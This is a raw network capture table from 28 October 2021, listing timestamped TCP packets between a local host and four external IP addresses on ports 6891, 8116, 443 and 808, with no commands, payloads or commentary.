Oct 28, 2021 05:28:34.108926058 CEST	6891	50078	45.77.0.96	192.168.2.3
Oct 28, 2021 05:28:34.174448013 CEST	8116	50079	185.56.219.47	192.168.2.3
Oct 28, 2021 05:28:34.174480915 CEST	8116	50079	185.56.219.47	192.168.2.3
Oct 28, 2021 05:28:34.174581051 CEST	50079	8116	192.168.2.3	185.56.219.47
Oct 28, 2021 05:28:34.174623966 CEST	50079	8116	192.168.2.3	185.56.219.47
Oct 28, 2021 05:28:34.182914972 CEST	50079	8116	192.168.2.3	185.56.219.47
Oct 28, 2021 05:28:34.237217903 CEST	8116	50079	185.56.219.47	192.168.2.3
Oct 28, 2021 05:28:34.303405046 CEST	50080	443	192.168.2.3	192.46.210.220
Oct 28, 2021 05:28:34.303469896 CEST	443	50080	192.46.210.220	192.168.2.3
Oct 28, 2021 05:28:34.303594112 CEST	50080	443	192.168.2.3	192.46.210.220
Oct 28, 2021 05:28:34.304212093 CEST	50080	443	192.168.2.3	192.46.210.220
Oct 28, 2021 05:28:34.304241896 CEST	443	50080	192.46.210.220	192.168.2.3
Oct 28, 2021 05:28:34.500572920 CEST	6891	50078	45.77.0.96	192.168.2.3
Oct 28, 2021 05:28:34.500607014 CEST	6891	50078	45.77.0.96	192.168.2.3
Oct 28, 2021 05:28:34.500669956 CEST	50078	6891	192.168.2.3	45.77.0.96
Oct 28, 2021 05:28:34.500709057 CEST	50078	6891	192.168.2.3	45.77.0.96
Oct 28, 2021 05:28:34.503956079 CEST	50078	6891	192.168.2.3	45.77.0.96
Oct 28, 2021 05:28:34.630203962 CEST	50081	8116	192.168.2.3	185.56.219.47
Oct 28, 2021 05:28:34.669891119 CEST	6891	50078	45.77.0.96	192.168.2.3
Oct 28, 2021 05:28:34.685533047 CEST	8116	50081	185.56.219.47	192.168.2.3
Oct 28, 2021 05:28:34.685743093 CEST	50081	8116	192.168.2.3	185.56.219.47
Oct 28, 2021 05:28:34.686335087 CEST	50081	8116	192.168.2.3	185.56.219.47
Oct 28, 2021 05:28:34.741425037 CEST	8116	50081	185.56.219.47	192.168.2.3
Oct 28, 2021 05:28:34.741622925 CEST	8116	50081	185.56.219.47	192.168.2.3
Oct 28, 2021 05:28:34.741786957 CEST	50081	8116	192.168.2.3	185.56.219.47
Oct 28, 2021 05:28:34.742408037 CEST	50081	8116	192.168.2.3	185.56.219.47
Oct 28, 2021 05:28:34.746934891 CEST	50081	8116	192.168.2.3	185.56.219.47
Oct 28, 2021 05:28:34.747127056 CEST	50081	8116	192.168.2.3	185.56.219.47
Oct 28, 2021 05:28:34.801896095 CEST	8116	50081	185.56.219.47	192.168.2.3
Oct 28, 2021 05:28:34.802501917 CEST	8116	50081	185.56.219.47	192.168.2.3
Oct 28, 2021 05:28:34.825298071 CEST	443	50080	192.46.210.220	192.168.2.3
Oct 28, 2021 05:28:34.825417995 CEST	50080	443	192.168.2.3	192.46.210.220
Oct 28, 2021 05:28:34.826127052 CEST	50080	443	192.168.2.3	192.46.210.220
Oct 28, 2021 05:28:34.826142073 CEST	443	50080	192.46.210.220	192.168.2.3
Oct 28, 2021 05:28:34.832247019 CEST	50080	443	192.168.2.3	192.46.210.220
Oct 28, 2021 05:28:34.832267046 CEST	443	50080	192.46.210.220	192.168.2.3
Oct 28, 2021 05:28:34.832391024 CEST	50080	443	192.168.2.3	192.46.210.220
Oct 28, 2021 05:28:34.832401037 CEST	443	50080	192.46.210.220	192.168.2.3
Oct 28, 2021 05:28:35.000415087 CEST	8116	50081	185.56.219.47	192.168.2.3
Oct 28, 2021 05:28:35.000441074 CEST	8116	50081	185.56.219.47	192.168.2.3
Oct 28, 2021 05:28:35.000658035 CEST	50081	8116	192.168.2.3	185.56.219.47
Oct 28, 2021 05:28:35.000716925 CEST	50081	8116	192.168.2.3	185.56.219.47
Oct 28, 2021 05:28:35.003694057 CEST	50081	8116	192.168.2.3	185.56.219.47
Oct 28, 2021 05:28:35.058370113 CEST	8116	50081	185.56.219.47	192.168.2.3
Oct 28, 2021 05:28:35.120837927 CEST	50082	443	192.168.2.3	192.46.210.220
Oct 28, 2021 05:28:35.120893955 CEST	443	50082	192.46.210.220	192.168.2.3
Oct 28, 2021 05:28:35.121123075 CEST	50082	443	192.168.2.3	192.46.210.220
Oct 28, 2021 05:28:35.121746063 CEST	50082	443	192.168.2.3	192.46.210.220
Oct 28, 2021 05:28:35.121772051 CEST	443	50082	192.46.210.220	192.168.2.3
Oct 28, 2021 05:28:35.547451019 CEST	443	50080	192.46.210.220	192.168.2.3
Oct 28, 2021 05:28:35.547534943 CEST	443	50080	192.46.210.220	192.168.2.3
Oct 28, 2021 05:28:35.547770023 CEST	50080	443	192.168.2.3	192.46.210.220
Oct 28, 2021 05:28:35.555809975 CEST	50080	443	192.168.2.3	192.46.210.220
Oct 28, 2021 05:28:35.555850029 CEST	443	50080	192.46.210.220	192.168.2.3
Oct 28, 2021 05:28:35.642410994 CEST	443	50082	192.46.210.220	192.168.2.3
Oct 28, 2021 05:28:35.645359039 CEST	50082	443	192.168.2.3	192.46.210.220
Oct 28, 2021 05:28:35.646080971 CEST	50082	443	192.168.2.3	192.46.210.220
Oct 28, 2021 05:28:35.646089077 CEST	443	50082	192.46.210.220	192.168.2.3
Oct 28, 2021 05:28:35.651845932 CEST	50082	443	192.168.2.3	192.46.210.220
Oct 28, 2021 05:28:35.651853085 CEST	443	50082	192.46.210.220	192.168.2.3
Oct 28, 2021 05:28:35.651979923 CEST	50082	443	192.168.2.3	192.46.210.220
Oct 28, 2021 05:28:35.651994944 CEST	443	50082	192.46.210.220	192.168.2.3
Oct 28, 2021 05:28:35.740550041 CEST	50083	808	192.168.2.3	143.244.140.214
Oct 28, 2021 05:28:35.915179014 CEST	808	50083	143.244.140.214	192.168.2.3
Oct 28, 2021 05:28:35.915287018 CEST	50083	808	192.168.2.3	143.244.140.214
Oct 28, 2021 05:28:35.917047977 CEST	50083	808	192.168.2.3	143.244.140.214
Oct 28, 2021 05:28:36.091447115 CEST	808	50083	143.244.140.214	192.168.2.3
Oct 28, 2021 05:28:36.091626883 CEST	808	50083	143.244.140.214	192.168.2.3
Oct 28, 2021 05:28:36.091727018 CEST	50083	808	192.168.2.3	143.244.140.214
Oct 28, 2021 05:28:36.092293024 CEST	50083	808	192.168.2.3	143.244.140.214
Oct 28, 2021 05:28:36.097410917 CEST	50083	808	192.168.2.3	143.244.140.214
Oct 28, 2021 05:28:36.097524881 CEST	50083	808	192.168.2.3	143.244.140.214
Oct 28, 2021 05:28:36.266799927 CEST	808	50083	143.244.140.214	192.168.2.3
Oct 28, 2021 05:28:36.271879911 CEST	808	50083	143.244.140.214	192.168.2.3
Oct 28, 2021 05:28:36.271944046 CEST	808	50083	143.244.140.214	192.168.2.3
Oct 28, 2021 05:28:36.271959066 CEST	808	50083	143.244.140.214	192.168.2.3
Oct 28, 2021 05:28:36.271975040 CEST	808	50083	143.244.140.214	192.168.2.3
Oct 28, 2021 05:28:36.365384102 CEST	443	50082	192.46.210.220	192.168.2.3
Oct 28, 2021 05:28:36.365503073 CEST	443	50082	192.46.210.220	192.168.2.3
Oct 28, 2021 05:28:36.365662098 CEST	50082	443	192.168.2.3	192.46.210.220
Oct 28, 2021 05:28:36.368968964 CEST	50082	443	192.168.2.3	192.46.210.220
Oct 28, 2021 05:28:36.368993998 CEST	50082	443	192.168.2.3	192.46.210.220
Oct 28, 2021 05:28:36.369024038 CEST	443	50082	192.46.210.220	192.168.2.3
Oct 28, 2021 05:28:36.525856972 CEST	50084	808	192.168.2.3	143.244.140.214
Oct 28, 2021 05:28:36.655230045 CEST	808	50083	143.244.140.214	192.168.2.3
Oct 28, 2021 05:28:36.655255079 CEST	808	50083	143.244.140.214	192.168.2.3
Oct 28, 2021 05:28:36.655353069 CEST	50083	808	192.168.2.3	143.244.140.214
Oct 28, 2021 05:28:36.655427933 CEST	50083	808	192.168.2.3	143.244.140.214
Oct 28, 2021 05:28:36.669030905 CEST	50083	808	192.168.2.3	143.244.140.214
Oct 28, 2021 05:28:36.687597990 CEST	808	50084	143.244.140.214	192.168.2.3
Oct 28, 2021 05:28:36.687978029 CEST	50084	808	192.168.2.3	143.244.140.214
Oct 28, 2021 05:28:36.688543081 CEST	50084	808	192.168.2.3	143.244.140.214
Oct 28, 2021 05:28:36.789638042 CEST	50085	6891	192.168.2.3	45.77.0.96
Oct 28, 2021 05:28:36.843633890 CEST	808	50083	143.244.140.214	192.168.2.3
Oct 28, 2021 05:28:36.850058079 CEST	808	50084	143.244.140.214	192.168.2.3
Oct 28, 2021 05:28:36.850289106 CEST	808	50084	143.244.140.214	192.168.2.3
Oct 28, 2021 05:28:36.850425005 CEST	50084	808	192.168.2.3	143.244.140.214
Oct 28, 2021 05:28:36.851087093 CEST	50084	808	192.168.2.3	143.244.140.214
Oct 28, 2021 05:28:36.856472015 CEST	50084	808	192.168.2.3	143.244.140.214
Oct 28, 2021 05:28:36.856637955 CEST	50084	808	192.168.2.3	143.244.140.214
Oct 28, 2021 05:28:36.956024885 CEST	6891	50085	45.77.0.96	192.168.2.3
Oct 28, 2021 05:28:36.956202030 CEST	50085	6891	192.168.2.3	45.77.0.96
Oct 28, 2021 05:28:36.957024097 CEST	50085	6891	192.168.2.3	45.77.0.96
Oct 28, 2021 05:28:37.012727022 CEST	808	50084	143.244.140.214	192.168.2.3
Oct 28, 2021 05:28:37.018166065 CEST	808	50084	143.244.140.214	192.168.2.3
Oct 28, 2021 05:28:37.020186901 CEST	808	50084	143.244.140.214	192.168.2.3
Oct 28, 2021 05:28:37.020236015 CEST	808	50084	143.244.140.214	192.168.2.3
Oct 28, 2021 05:28:37.122805119 CEST	6891	50085	45.77.0.96	192.168.2.3
Oct 28, 2021 05:28:37.122982025 CEST	6891	50085	45.77.0.96	192.168.2.3
Oct 28, 2021 05:28:37.123045921 CEST	50085	6891	192.168.2.3	45.77.0.96
Oct 28, 2021 05:28:37.123512983 CEST	50085	6891	192.168.2.3	45.77.0.96
Oct 28, 2021 05:28:37.126818895 CEST	50085	6891	192.168.2.3	45.77.0.96
Oct 28, 2021 05:28:37.126940966 CEST	50085	6891	192.168.2.3	45.77.0.96
Oct 28, 2021 05:28:37.293219090 CEST	6891	50085	45.77.0.96	192.168.2.3
Oct 28, 2021 05:28:37.293241024 CEST	6891	50085	45.77.0.96	192.168.2.3
Oct 28, 2021 05:28:37.396287918 CEST	808	50084	143.244.140.214	192.168.2.3
Oct 28, 2021 05:28:37.396315098 CEST	808	50084	143.244.140.214	192.168.2.3
Oct 28, 2021 05:28:37.396518946 CEST	50084	808	192.168.2.3	143.244.140.214
Oct 28, 2021 05:28:37.396552086 CEST	50084	808	192.168.2.3	143.244.140.214
Oct 28, 2021 05:28:37.402780056 CEST	50084	808	192.168.2.3	143.244.140.214
Oct 28, 2021 05:28:37.520174026 CEST	50086	6891	192.168.2.3	45.77.0.96
Oct 28, 2021 05:28:37.564557076 CEST	808	50084	143.244.140.214	192.168.2.3
Oct 28, 2021 05:28:37.671264887 CEST	6891	50085	45.77.0.96	192.168.2.3
Oct 28, 2021 05:28:37.671288967 CEST	6891	50085	45.77.0.96	192.168.2.3
Oct 28, 2021 05:28:37.671432018 CEST	50085	6891	192.168.2.3	45.77.0.96
Oct 28, 2021 05:28:37.671454906 CEST	50085	6891	192.168.2.3	45.77.0.96
Oct 28, 2021 05:28:37.678628922 CEST	50085	6891	192.168.2.3	45.77.0.96
Oct 28, 2021 05:28:37.686327934 CEST	6891	50086	45.77.0.96	192.168.2.3
Oct 28, 2021 05:28:37.686438084 CEST	50086	6891	192.168.2.3	45.77.0.96
Oct 28, 2021 05:28:37.686907053 CEST	50086	6891	192.168.2.3	45.77.0.96
Oct 28, 2021 05:28:37.786768913 CEST	50087	8116	192.168.2.3	185.56.219.47
Oct 28, 2021 05:28:37.839591026 CEST	8116	50087	185.56.219.47	192.168.2.3
Oct 28, 2021 05:28:37.839677095 CEST	50087	8116	192.168.2.3	185.56.219.47
Oct 28, 2021 05:28:37.844568014 CEST	6891	50085	45.77.0.96	192.168.2.3
Oct 28, 2021 05:28:37.852890015 CEST	6891	50086	45.77.0.96	192.168.2.3
Oct 28, 2021 05:28:37.852963924 CEST	6891	50086	45.77.0.96	192.168.2.3
Oct 28, 2021 05:28:37.853033066 CEST	50086	6891	192.168.2.3	45.77.0.96
Oct 28, 2021 05:28:37.853563070 CEST	50086	6891	192.168.2.3	45.77.0.96
Oct 28, 2021 05:28:37.857633114 CEST	50086	6891	192.168.2.3	45.77.0.96
Oct 28, 2021 05:28:37.857758045 CEST	50086	6891	192.168.2.3	45.77.0.96
Oct 28, 2021 05:28:37.871536016 CEST	50087	8116	192.168.2.3	185.56.219.47
Oct 28, 2021 05:28:37.924137115 CEST	8116	50087	185.56.219.47	192.168.2.3
Oct 28, 2021 05:28:37.924320936 CEST	8116	50087	185.56.219.47	192.168.2.3
Oct 28, 2021 05:28:37.924479008 CEST	50087	8116	192.168.2.3	185.56.219.47
Oct 28, 2021 05:28:37.925345898 CEST	50087	8116	192.168.2.3	185.56.219.47
Oct 28, 2021 05:28:37.933960915 CEST	50087	8116	192.168.2.3	185.56.219.47
Oct 28, 2021 05:28:37.934248924 CEST	50087	8116	192.168.2.3	185.56.219.47
Oct 28, 2021 05:28:37.986691952 CEST	8116	50087	185.56.219.47	192.168.2.3
Oct 28, 2021 05:28:37.986788988 CEST	8116	50087	185.56.219.47	192.168.2.3
Oct 28, 2021 05:28:38.023612022 CEST	6891	50086	45.77.0.96	192.168.2.3
Oct 28, 2021 05:28:38.023644924 CEST	6891	50086	45.77.0.96	192.168.2.3
Oct 28, 2021 05:28:38.023689032 CEST	6891	50086	45.77.0.96	192.168.2.3
Oct 28, 2021 05:28:38.170314074 CEST	8116	50087	185.56.219.47	192.168.2.3
Oct 28, 2021 05:28:38.170339108 CEST	8116	50087	185.56.219.47	192.168.2.3
Oct 28, 2021 05:28:38.170669079 CEST	50087	8116	192.168.2.3	185.56.219.47
Oct 28, 2021 05:28:38.170775890 CEST	50087	8116	192.168.2.3	185.56.219.47
Oct 28, 2021 05:28:38.186410904 CEST	50087	8116	192.168.2.3	185.56.219.47
Oct 28, 2021 05:28:38.240825891 CEST	8116	50087	185.56.219.47	192.168.2.3
Oct 28, 2021 05:28:38.302937984 CEST	50088	443	192.168.2.3	192.46.210.220
Oct 28, 2021 05:28:38.302999973 CEST	443	50088	192.46.210.220	192.168.2.3
Oct 28, 2021 05:28:38.303136110 CEST	50088	443	192.168.2.3	192.46.210.220
Oct 28, 2021 05:28:38.304335117 CEST	50088	443	192.168.2.3	192.46.210.220
Oct 28, 2021 05:28:38.304369926 CEST	443	50088	192.46.210.220	192.168.2.3
Oct 28, 2021 05:28:38.411007881 CEST	6891	50086	45.77.0.96	192.168.2.3
Oct 28, 2021 05:28:38.411026955 CEST	6891	50086	45.77.0.96	192.168.2.3
Oct 28, 2021 05:28:38.411111116 CEST	50086	6891	192.168.2.3	45.77.0.96
Oct 28, 2021 05:28:38.411151886 CEST	50086	6891	192.168.2.3	45.77.0.96
Oct 28, 2021 05:28:38.414608002 CEST	50086	6891	192.168.2.3	45.77.0.96
Oct 28, 2021 05:28:38.541862011 CEST	50089	8116	192.168.2.3	185.56.219.47
Oct 28, 2021 05:28:38.580527067 CEST	6891	50086	45.77.0.96	192.168.2.3
Oct 28, 2021 05:28:38.602174997 CEST	8116	50089	185.56.219.47	192.168.2.3
Oct 28, 2021 05:28:38.602359056 CEST	50089	8116	192.168.2.3	185.56.219.47
Oct 28, 2021 05:28:38.603089094 CEST	50089	8116	192.168.2.3	185.56.219.47
Oct 28, 2021 05:28:38.663060904 CEST	8116	50089	185.56.219.47	192.168.2.3
Oct 28, 2021 05:28:38.663320065 CEST	8116	50089	185.56.219.47	192.168.2.3
Oct 28, 2021 05:28:38.663444042 CEST	50089	8116	192.168.2.3	185.56.219.47
Oct 28, 2021 05:28:38.664027929 CEST	50089	8116	192.168.2.3	185.56.219.47
Oct 28, 2021 05:28:38.668112993 CEST	50089	8116	192.168.2.3	185.56.219.47
Oct 28, 2021 05:28:38.668143034 CEST	50089	8116	192.168.2.3	185.56.219.47
Oct 28, 2021 05:28:38.728265047 CEST	8116	50089	185.56.219.47	192.168.2.3
Oct 28, 2021 05:28:38.728811026 CEST	8116	50089	185.56.219.47	192.168.2.3
Oct 28, 2021 05:28:38.793646097 CEST	443	50088	192.46.210.220	192.168.2.3
Oct 28, 2021 05:28:38.793776989 CEST	50088	443	192.168.2.3	192.46.210.220
Oct 28, 2021 05:28:38.794550896 CEST	50088	443	192.168.2.3	192.46.210.220
Oct 28, 2021 05:28:38.794574976 CEST	443	50088	192.46.210.220	192.168.2.3
Oct 28, 2021 05:28:38.799065113 CEST	50088	443	192.168.2.3	192.46.210.220
Oct 28, 2021 05:28:38.799092054 CEST	443	50088	192.46.210.220	192.168.2.3
Oct 28, 2021 05:28:38.799163103 CEST	50088	443	192.168.2.3	192.46.210.220
Oct 28, 2021 05:28:38.799182892 CEST	443	50088	192.46.210.220	192.168.2.3
Oct 28, 2021 05:28:38.913021088 CEST	8116	50089	185.56.219.47	192.168.2.3
Oct 28, 2021 05:28:38.913041115 CEST	8116	50089	185.56.219.47	192.168.2.3
Oct 28, 2021 05:28:38.913259029 CEST	50089	8116	192.168.2.3	185.56.219.47
Oct 28, 2021 05:28:38.913373947 CEST	50089	8116	192.168.2.3	185.56.219.47
Oct 28, 2021 05:28:38.921267986 CEST	50089	8116	192.168.2.3	185.56.219.47
Oct 28, 2021 05:28:38.981523037 CEST	8116	50089	185.56.219.47	192.168.2.3
Oct 28, 2021 05:28:39.063981056 CEST	50090	443	192.168.2.3	192.46.210.220
Oct 28, 2021 05:28:39.064069033 CEST	443	50090	192.46.210.220	192.168.2.3
Oct 28, 2021 05:28:39.064243078 CEST	50090	443	192.168.2.3	192.46.210.220
Oct 28, 2021 05:28:39.066900969 CEST	50090	443	192.168.2.3	192.46.210.220
Oct 28, 2021 05:28:39.066922903 CEST	443	50090	192.46.210.220	192.168.2.3
Oct 28, 2021 05:28:39.484447002 CEST	443	50088	192.46.210.220	192.168.2.3
Oct 28, 2021 05:28:39.484572887 CEST	443	50088	192.46.210.220	192.168.2.3
Oct 28, 2021 05:28:39.484579086 CEST	50088	443	192.168.2.3	192.46.210.220
Oct 28, 2021 05:28:39.484637022 CEST	50088	443	192.168.2.3	192.46.210.220
Oct 28, 2021 05:28:39.495050907 CEST	50088	443	192.168.2.3	192.46.210.220
Oct 28, 2021 05:28:39.495085001 CEST	443	50088	192.46.210.220	192.168.2.3
Oct 28, 2021 05:28:39.587610960 CEST	443	50090	192.46.210.220	192.168.2.3
Oct 28, 2021 05:28:39.587846041 CEST	50090	443	192.168.2.3	192.46.210.220
Oct 28, 2021 05:28:39.588532925 CEST	50090	443	192.168.2.3	192.46.210.220
Oct 28, 2021 05:28:39.588557959 CEST	443	50090	192.46.210.220	192.168.2.3
Oct 28, 2021 05:28:39.593487978 CEST	50090	443	192.168.2.3	192.46.210.220
Oct 28, 2021 05:28:39.593523979 CEST	443	50090	192.46.210.220	192.168.2.3
Oct 28, 2021 05:28:39.593668938 CEST	50090	443	192.168.2.3	192.46.210.220
Oct 28, 2021 05:28:39.593681097 CEST	443	50090	192.46.210.220	192.168.2.3
Oct 28, 2021 05:28:39.615668058 CEST	50091	808	192.168.2.3	143.244.140.214
Oct 28, 2021 05:28:39.785161018 CEST	808	50091	143.244.140.214	192.168.2.3
Oct 28, 2021 05:28:39.785310030 CEST	50091	808	192.168.2.3	143.244.140.214
Oct 28, 2021 05:28:39.785856009 CEST	50091	808	192.168.2.3	143.244.140.214
Oct 28, 2021 05:28:39.955096006 CEST	808	50091	143.244.140.214	192.168.2.3
Oct 28, 2021 05:28:39.955162048 CEST	808	50091	143.244.140.214	192.168.2.3
Oct 28, 2021 05:28:39.955310106 CEST	50091	808	192.168.2.3	143.244.140.214
Oct 28, 2021 05:28:39.956075907 CEST	50091	808	192.168.2.3	143.244.140.214
Oct 28, 2021 05:28:39.962524891 CEST	50091	808	192.168.2.3	143.244.140.214
Oct 28, 2021 05:28:39.962714911 CEST	50091	808	192.168.2.3	143.244.140.214
Oct 28, 2021 05:28:40.125355005 CEST	808	50091	143.244.140.214	192.168.2.3
Oct 28, 2021 05:28:40.131783962 CEST	808	50091	143.244.140.214	192.168.2.3
Oct 28, 2021 05:28:40.131814003 CEST	808	50091	143.244.140.214	192.168.2.3
Oct 28, 2021 05:28:40.131830931 CEST	808	50091	143.244.140.214	192.168.2.3
Oct 28, 2021 05:28:40.307301044 CEST	443	50090	192.46.210.220	192.168.2.3
Oct 28, 2021 05:28:40.307379007 CEST	443	50090	192.46.210.220	192.168.2.3
Oct 28, 2021 05:28:40.307404995 CEST	50090	443	192.168.2.3	192.46.210.220
Oct 28, 2021 05:28:40.307420969 CEST	50090	443	192.168.2.3	192.46.210.220
Oct 28, 2021 05:28:40.310671091 CEST	50090	443	192.168.2.3	192.46.210.220
Oct 28, 2021 05:28:40.310698986 CEST	443	50090	192.46.210.220	192.168.2.3
Oct 28, 2021 05:28:40.474627018 CEST	50092	808	192.168.2.3	143.244.140.214
Oct 28, 2021 05:28:40.517179012 CEST	808	50091	143.244.140.214	192.168.2.3
Oct 28, 2021 05:28:40.517210960 CEST	808	50091	143.244.140.214	192.168.2.3
Oct 28, 2021 05:28:40.517625093 CEST	50091	808	192.168.2.3	143.244.140.214
Oct 28, 2021 05:28:40.524456978 CEST	50091	808	192.168.2.3	143.244.140.214
Oct 28, 2021 05:28:40.642632008 CEST	808	50092	143.244.140.214	192.168.2.3
Oct 28, 2021 05:28:40.642738104 CEST	50092	808	192.168.2.3	143.244.140.214
Oct 28, 2021 05:28:40.643523932 CEST	50092	808	192.168.2.3	143.244.140.214
Oct 28, 2021 05:28:40.646543980 CEST	50093	6891	192.168.2.3	45.77.0.96
Oct 28, 2021 05:28:40.693888903 CEST	808	50091	143.244.140.214	192.168.2.3
Oct 28, 2021 05:28:40.811281919 CEST	808	50092	143.244.140.214	192.168.2.3
Oct 28, 2021 05:28:40.811602116 CEST	808	50092	143.244.140.214	192.168.2.3
Oct 28, 2021 05:28:40.811681032 CEST	50092	808	192.168.2.3	143.244.140.214
Oct 28, 2021 05:28:40.812231064 CEST	50092	808	192.168.2.3	143.244.140.214
Oct 28, 2021 05:28:40.812442064 CEST	6891	50093	45.77.0.96	192.168.2.3
Oct 28, 2021 05:28:40.812537909 CEST	50093	6891	192.168.2.3	45.77.0.96
Oct 28, 2021 05:28:40.816354036 CEST	50092	808	192.168.2.3	143.244.140.214
Oct 28, 2021 05:28:40.816551924 CEST	50092	808	192.168.2.3	143.244.140.214
Oct 28, 2021 05:28:40.817339897 CEST	50093	6891	192.168.2.3	45.77.0.96
Oct 28, 2021 05:28:40.979942083 CEST	808	50092	143.244.140.214	192.168.2.3
Oct 28, 2021 05:28:40.983213902 CEST	6891	50093	45.77.0.96	192.168.2.3
Oct 28, 2021 05:28:40.983421087 CEST	6891	50093	45.77.0.96	192.168.2.3
Oct 28, 2021 05:28:40.983498096 CEST	50093	6891	192.168.2.3	45.77.0.96
Oct 28, 2021 05:28:40.983938932 CEST	808	50092	143.244.140.214	192.168.2.3
Oct 28, 2021 05:28:40.984056950 CEST	50093	6891	192.168.2.3	45.77.0.96
Oct 28, 2021 05:28:40.984169006 CEST	808	50092	143.244.140.214	192.168.2.3
Oct 28, 2021 05:28:40.984287977 CEST	808	50092	143.244.140.214	192.168.2.3
Oct 28, 2021 05:28:40.984303951 CEST	808	50092	143.244.140.214	192.168.2.3
Oct 28, 2021 05:28:40.988030910 CEST	50093	6891	192.168.2.3	45.77.0.96
Oct 28, 2021 05:28:40.988147020 CEST	50093	6891	192.168.2.3	45.77.0.96
Oct 28, 2021 05:28:41.154261112 CEST	6891	50093	45.77.0.96	192.168.2.3
Oct 28, 2021 05:28:41.154283047 CEST	6891	50093	45.77.0.96	192.168.2.3
Oct 28, 2021 05:28:41.372145891 CEST	808	50092	143.244.140.214	192.168.2.3
Oct 28, 2021 05:28:41.372175932 CEST	808	50092	143.244.140.214	192.168.2.3
Oct 28, 2021 05:28:41.372292042 CEST	50092	808	192.168.2.3	143.244.140.214
Oct 28, 2021 05:28:41.375144005 CEST	50092	808	192.168.2.3	143.244.140.214
Oct 28, 2021 05:28:41.493730068 CEST	50094	6891	192.168.2.3	45.77.0.96
Oct 28, 2021 05:28:41.534761906 CEST	6891	50093	45.77.0.96	192.168.2.3
Oct 28, 2021 05:28:41.534792900 CEST	6891	50093	45.77.0.96	192.168.2.3
Oct 28, 2021 05:28:41.534893036 CEST	50093	6891	192.168.2.3	45.77.0.96
Oct 28, 2021 05:28:41.543648005 CEST	808	50092	143.244.140.214	192.168.2.3
Oct 28, 2021 05:28:41.545897007 CEST	50093	6891	192.168.2.3	45.77.0.96
Oct 28, 2021 05:28:41.659908056 CEST	6891	50094	45.77.0.96	192.168.2.3
Oct 28, 2021 05:28:41.661855936 CEST	50094	6891	192.168.2.3	45.77.0.96
Oct 28, 2021 05:28:41.662518024 CEST	50094	6891	192.168.2.3	45.77.0.96
Oct 28, 2021 05:28:41.662950993 CEST	50095	8116	192.168.2.3	185.56.219.47
Oct 28, 2021 05:28:41.711963892 CEST	6891	50093	45.77.0.96	192.168.2.3
Oct 28, 2021 05:28:41.716139078 CEST	8116	50095	185.56.219.47	192.168.2.3
Oct 28, 2021 05:28:41.716514111 CEST	50095	8116	192.168.2.3	185.56.219.47
Oct 28, 2021 05:28:41.717225075 CEST	50095	8116	192.168.2.3	185.56.219.47
Oct 28, 2021 05:28:41.770199060 CEST	8116	50095	185.56.219.47	192.168.2.3
Oct 28, 2021 05:28:41.770440102 CEST	8116	50095	185.56.219.47	192.168.2.3
Oct 28, 2021 05:28:41.770509958 CEST	50095	8116	192.168.2.3	185.56.219.47
Oct 28, 2021 05:28:41.771038055 CEST	50095	8116	192.168.2.3	185.56.219.47
Oct 28, 2021 05:28:41.774764061 CEST	50095	8116	192.168.2.3	185.56.219.47
Oct 28, 2021 05:28:41.774908066 CEST	50095	8116	192.168.2.3	185.56.219.47
Oct 28, 2021 05:28:41.827812910 CEST	8116	50095	185.56.219.47	192.168.2.3
Oct 28, 2021 05:28:41.828404903 CEST	6891	50094	45.77.0.96	192.168.2.3
Oct 28, 2021 05:28:41.828567028 CEST	6891	50094	45.77.0.96	192.168.2.3
Oct 28, 2021 05:28:41.828658104 CEST	50094	6891	192.168.2.3	45.77.0.96
Oct 28, 2021 05:28:41.829287052 CEST	50094	6891	192.168.2.3	45.77.0.96
Oct 28, 2021 05:28:41.833342075 CEST	50094	6891	192.168.2.3	45.77.0.96
Oct 28, 2021 05:28:41.833456993 CEST	50094	6891	192.168.2.3	45.77.0.96
Oct 28, 2021 05:28:41.997512102 CEST	8116	50095	185.56.219.47	192.168.2.3
Oct 28, 2021 05:28:41.997535944 CEST	8116	50095	185.56.219.47	192.168.2.3
Oct 28, 2021 05:28:41.997714996 CEST	50095	8116	192.168.2.3	185.56.219.47
Oct 28, 2021 05:28:41.997736931 CEST	50095	8116	192.168.2.3	185.56.219.47
Oct 28, 2021 05:28:41.999491930 CEST	6891	50094	45.77.0.96	192.168.2.3
Oct 28, 2021 05:28:42.005764961 CEST	50095	8116	192.168.2.3	185.56.219.47
Oct 28, 2021 05:28:42.058765888 CEST	8116	50095	185.56.219.47	192.168.2.3
Oct 28, 2021 05:28:42.116209984 CEST	50096	443	192.168.2.3	192.46.210.220
Oct 28, 2021 05:28:42.116254091 CEST	443	50096	192.46.210.220	192.168.2.3
Oct 28, 2021 05:28:42.116354942 CEST	50096	443	192.168.2.3	192.46.210.220
Oct 28, 2021 05:28:42.117141008 CEST	50096	443	192.168.2.3	192.46.210.220
Oct 28, 2021 05:28:42.117153883 CEST	443	50096	192.46.210.220	192.168.2.3
Oct 28, 2021 05:28:42.394825935 CEST	6891	50094	45.77.0.96	192.168.2.3
Oct 28, 2021 05:28:42.394853115 CEST	6891	50094	45.77.0.96	192.168.2.3
Oct 28, 2021 05:28:42.395117998 CEST	50094	6891	192.168.2.3	45.77.0.96
Oct 28, 2021 05:28:42.395138025 CEST	50094	6891	192.168.2.3	45.77.0.96
Oct 28, 2021 05:28:42.398211002 CEST	50094	6891	192.168.2.3	45.77.0.96
Oct 28, 2021 05:28:42.526031971 CEST	50097	8116	192.168.2.3	185.56.219.47
Oct 28, 2021 05:28:42.564496040 CEST	6891	50094	45.77.0.96	192.168.2.3
Oct 28, 2021 05:28:42.587647915 CEST	8116	50097	185.56.219.47	192.168.2.3
Oct 28, 2021 05:28:42.587762117 CEST	50097	8116	192.168.2.3	185.56.219.47
Oct 28, 2021 05:28:42.588586092 CEST	50097	8116	192.168.2.3	185.56.219.47
Oct 28, 2021 05:28:42.642509937 CEST	443	50096	192.46.210.220	192.168.2.3
Oct 28, 2021 05:28:42.646096945 CEST	50096	443	192.168.2.3	192.46.210.220
Oct 28, 2021 05:28:42.646122932 CEST	50096	443	192.168.2.3	192.46.210.220
Oct 28, 2021 05:28:42.646142006 CEST	443	50096	192.46.210.220	192.168.2.3
Oct 28, 2021 05:28:42.648272038 CEST	8116	50097	185.56.219.47	192.168.2.3
Oct 28, 2021 05:28:42.648439884 CEST	8116	50097	185.56.219.47	192.168.2.3
Oct 28, 2021 05:28:42.648518085 CEST	50097	8116	192.168.2.3	185.56.219.47
Oct 28, 2021 05:28:42.649035931 CEST	50097	8116	192.168.2.3	185.56.219.47
Oct 28, 2021 05:28:42.650614977 CEST	50096	443	192.168.2.3	192.46.210.220
Oct 28, 2021 05:28:42.650634050 CEST	443	50096	192.46.210.220	192.168.2.3
